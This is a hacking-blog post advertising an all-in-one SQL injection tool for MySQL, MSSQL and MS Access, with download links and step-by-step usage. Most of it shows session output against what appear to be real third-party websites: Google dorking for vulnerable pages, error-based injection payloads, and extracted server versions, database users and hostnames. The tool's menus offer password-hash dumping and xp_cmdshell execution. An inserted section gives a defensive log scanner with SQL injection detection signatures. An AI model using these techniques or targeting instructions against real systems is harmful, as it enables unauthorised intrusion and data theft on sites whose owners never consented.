Devilzc0de SQL Injection Tool (mysql&mssql) | Ksecurity-team

Devilzc0de SQL Injection Tool (mysql&mssql)



Tool name: devilzc0desql.py version 1.0
Download url:
http://flightinformationdisplay.com/mywisdom/devilzc0desql.tgz
or
http://yoyoparty.com/upload/devilzc0desql.tgz
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Requirement(s): python, php (with curl library installed) and perl

Ok guys, welcome to a new product from Devilzc0de; this time we dedicate this all-in-one SQL injection tool to you.
So, what is devilzc0desql? It is a very sophisticated SQL injection tool for MySQL injection, MSSQL injection and MS Access (Jet OLEDB) SQL injection.
If you don't have PHP, Perl and Python, you need to install them in order to run this tool properly. Then you must set php, perl and python to run globally from your command prompt or shell.
Ok, I suppose you have installed them on your machine. To run this, open your terminal or MS-DOS prompt, then cd to the devilzc0desql directory (on Unix or Linux you may extract it using: tar zxvf devilzc0desql.tgz).
Then just type:
python devilzc0desql.py
And the result is:


root@DL:/opt/lampp/htdocs/webhackframework/devilzc0desql# ./devilzc0desql.py

****************************************************************************

                 Devilzc0deSQL.py version 1.0                                                      

                 Programmer: mywisdom (antonsoft_2004@yahoo.com)                                    

                 Dedicated to: Devilzc0de                                                 

                 This is All in one sql injection tool for both mysql and msssql and ms access     

****************************************************************************

        Please choose your option below:

 [1] Attack Mysql target (this will lauch hzosql)

 [2] Attack Mssql target (this will launch silviasql)

 Type 1 or 2 for your choice below !

Please type your choice:
Ok then, if you need to run the MySQL injection tool, just type: 1
Otherwise, if you want to run the MSSQL injection tool, just type: 2
Option number 1 (running mysql injection tool mode (hzosql))
Ok, if you have typed 1, it will run the MySQL injection tool, something like this:


***********************************************************************************************************************************************
         HZO mysql injection tool version 2.0
dedicated for hackerzonline.info,devilzc0de.org,gorontalodefacer.org,h4cky0u.org,jasakom.com,yogyacarderlink.web.id and darkc0de.com
          by: mywisdom (antonsoft_2004@yahoo.com)
*************************************************************************************************************************************************

Results saved at hzosql.log

additional support(s): load file checking, blind sqli checking, log w00t message at hzosql.log
Steps:
1. Check url for vulnerable sql injection or blind sql injection
2. Check multiple url lists from a text file for vulnerable sql injection and blind sql injection
3. Find column length of multiple url lists from a text file (non blind sqli)
4. Find column length of sqli and blind sql injection of a target
5. Get mysql server configuration from a sqli url (must include code),load file, select mysql.user (mysql 4 and 5)
6. Show all databases user has access to (must include code) ( mysql 5+)
7. Enumerates information_schema databases(must include code) (mysql 5+)
8. Dump information from database, table or column (must include code) (mysql 4 and 5)
9. Fuzz tables and columns (must include code) (mysql 4)
10.Automatic Step by Steps Sql Injections or Blind Sql Injections (run step 4 until step 7 automaticly)
11.Full Web SQLi testing (search sqli from every proper url at front page)
12.Exit this module
Just type 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 (based on steps you have done)

Type your step number:
Ok, this is our MySQL injection tool called hzo sql version 2.0. It differs from version 1.0: this version now supports more accurate blind SQL injection, load file checking, and logging of results.
Ok, to do a quick SQL injection the best way is to use option number 10, so all you need to do is type 10; it will then ask you for your target url, something like this:



Type your step number:
10

*******************loading...***********************************
(this tool can work with blind sql injection now!!!)

Type your target url:

http://www.vaalweekly.com/index.php?option=com_ignitegallery&task=view&gallery=5

(if you don't type max column length to search, max column search will be 100)
Type max column length number to search:
15
Ok, in this sample I just copy and paste my target url:
http://www.vaalweekly.com/index.php?option=com_ignitegallery&task=view&gallery=5
Then it will ask you for the max column length number. In this case I type 15 as the max column length for the test; it's up to you, you may input 20 or 20 or 100, and so on…
Ok, then you will see below that our target is vulnerable to blind SQL injection:


The MSSQL Injection Tool
Ok, suppose you run devilzc0desql.py and choose option number 2; here is how our MSSQL injection tool starts:



Ok, next I'm testing a search for vulnerable target(s) from Google UK; here is the sample:



Ok, here's a more complete step-by-step example:

**********************Silvia SQL version 2.0***************************

             Programmer:mywisdom (antonsoft_2004.com)   

                        SQLI Tool for MSSQL & MS Jet    

                   Especially dedicated for Silvia     

**********************Silvia SQL version 1.0***************************
Option numbers / Steps:
0. Search for sqli vulnerable site(s) from google based on a region(MSSQL and MS Jet only)
1. Check url for vulnerable sql injection (MSSQL and MS Jet)
2. Getting MSSQL Configuration (MSSQL only)
3. Search for Table Name(s) in current Database (MSSQL only)
4. Search for Column Name(s) in a table (MSSQL only)
5. Dump a column (MSSQL only)
6. Automatic Step by Step (Run Step 1 until step 4 automaticly (MSSQL only))
7. List a User and password hash (MSSQL only)
8. Try EXEC xp_cmdshell(MSSQL 2000 only)
9. Searh Column length then try Fuzzing Table(s) and column(s)(MS Jet only)
Type help for Help, type exit to stop this tool
(just type: 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9)
Type your option number:0

This tool will use google.com as default, you may choose other google based on country
Do you want to google search based on country ? (y/n)y

Available google url based on country, please choose:
1. www.google.com
2. www.google.co.uk (google uk)
3. www.google.co.id (google indonesia)
4. www.google.co.il (google israel)
5. www.google.co.in (google india)
6. www.google.co.jp (google japan)
7. www.google.cn (google china)
8. www.google.com.sg (google singapore)
9. www.google.com.my (google malaysia)
10. www.google.com.tr (google turkey)
11. www.google.com.pk (google pakistan)
12. www.google.co.il (google israel)
13. www.google.es (google spain)
14. www.google.com.au (google australia)
(just type the number :1 or 2 or 3 till 14)
Type option number:2

Insert Google Dork:inurl:"page.asp?id="
Total Query Pages (10 Links/Pages) :10

[+] Please wait ! Searching vulnerable mssql and ms jet injection target(s) from google  ...

-----------------------------------------------

--------Going to Next Page ----------------

Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=0&meta=cr=countryUK|countryGB

--------Searching from next page,please wait----------------

[+]http://www.northernirelandscreen.co.uk/page.asp?id=211' => Could be Vulnerable in MS Access Injection!!

--------Going to Next Page ----------------

Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=10&meta=cr=countryUK|countryGB

--------Searching from next page,please wait----------------

[+]http://www.northernirelandscreen.co.uk/page.asp?id=239' => Could be Vulnerable in MS Access Injection!!

--------Going to Next Page ----------------

Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=20&meta=cr=countryUK|countryGB

--------Searching from next page,please wait----------------

[+]http://www.englishwomensgolf.org/page.asp?id=327' => Could be Vulnerable in MSSQL Injection!!
Ok, here's an explanation of the above step(s):

From the above sample, I choose option number 0; this will use Google to search for vulnerable target(s). Then I type y to choose to search for targets based on country.
And next I choose option number 2 for Google UK, then I input this dork inurl:"page.asp?id=" and finally I type 10 to search every 10 pages.

Ok, next we're testing a target; here's the sample of this silviasql:


Type your option number:2
Do you want to use proxy url ? (y/n)n

must include http://
Type target url:http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307

**********working please wait**************

[-] Gathering MSSQL configuration...please wait...
[-]SQLI url:http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307+and+1=convert(int,@@version)#

[+]Version Info:Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
 Feb  9 2007 22:47:07
 Copyright (c) 1988-2005 Microsoft Corporation
 Express Edition with Advanced Services on Windows NT 5.2 (Build 3790: Service Pack 2)

[+]Current User:wbcRM-dbuser-readonly

[+]Current Database:wbcRM

[+]Hostname:WATERBALANCE

_________________________________________________________________
Completed running your operation, result saved at silvialog.txt
(If no result(s) showed here means there's no data or data can not be dump or your proxy doesnt work, you should check manually or use other working proxy)
mywisdom@DL:/opt/lampp/htdocs/webhackframework/devilzc0desql$ 
Ok, here's a little explanation of the above sample.
First I choose the MSSQL injection tool after running devilzc0desql.py, then I type number 2 for getting MSSQL information, then I type n, which means no proxy. Then I type my target url:

http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307
and enter and so on…
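
A defender's view of the same traffic, as an added example that is not part of the original post or of the tool: a Python scan of web access logs for the request patterns visible in the output above (the trailing `'` probe and `convert(int,@@version)`, plus `xp_cmdshell`, `information_schema` and `mysql.user` from the menus). The log lines, IP addresses, paths and signature names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Signatures taken from the requests and menu items shown on this page.
SIGNATURES = [
    ("mssql-error-based-convert", re.compile(r"convert\s*\(\s*int\s*,\s*@@\w+", re.I)),
    ("mssql-xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
    ("mysql-information_schema", re.compile(r"information_schema", re.I)),
    ("mysql-user-table", re.compile(r"mysql\.user", re.I)),
    ("trailing-quote-probe", re.compile(r"'\s*$")),
]

# Common Log Format: ip ident user [time] "METHOD target HTTP/x.y" status size
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2011:16:58:01 +0000] "GET /page.asp?id=211%27 HTTP/1.1" 500 1203',
    '192.0.2.10 - - [24/Jan/2011:16:58:03 +0000] '
    '"GET /index.asp?type=single&sid=44&id=307+and+1=convert(int,@@version) HTTP/1.1" 500 2210',
    '198.51.100.7 - - [24/Jan/2011:16:59:10 +0000] "GET /page.asp?id=211 HTTP/1.1" 200 5120',
]

def classify(log_line):
    """Return (client_ip, status, sorted signature names), or None if unparseable."""
    m = REQUEST.match(log_line)
    if not m:
        return None
    ip, target, status = m.groups()
    hits = set()
    # parse_qsl percent-decodes values and turns '+' into a space,
    # so URL-encoded probes are matched in their decoded form.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(sig for sig, rx in SIGNATURES if rx.search(value))
    return ip, int(status), sorted(hits)

def summarize(lines):
    """Map client IP -> {signature: count} for requests that matched a signature."""
    report = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[2]:
            report.setdefault(parsed[0], Counter()).update(parsed[2])
    return {ip: dict(counts) for ip, counts in report.items()}

if __name__ == "__main__":
    for ip, sigs in summarize(SAMPLE_LOG).items():
        print(ip, sigs)
```

A 500 status next to a match, as `classify` returns for the first two sample lines, suggests the application is sending database errors back to the client; parameterized queries and generic error pages remove what these probes rely on.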

Ok see you again …

greets: all devilzc0de, ycl,tecon,jasakom,jatimcrew, darkc0de crews and members




2 Responses to "Devilzc0de SQL Injection Tool (mysql&mssql)"

Anonymous said...

down


January 24, 2011 at 4:58 PM
Blogger said...

Are you trying to earn money from your websites or blogs by running popunder ads?
In case you are, did you take a look at PopCash?


September 22, 2016 at 9:20 AM


© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com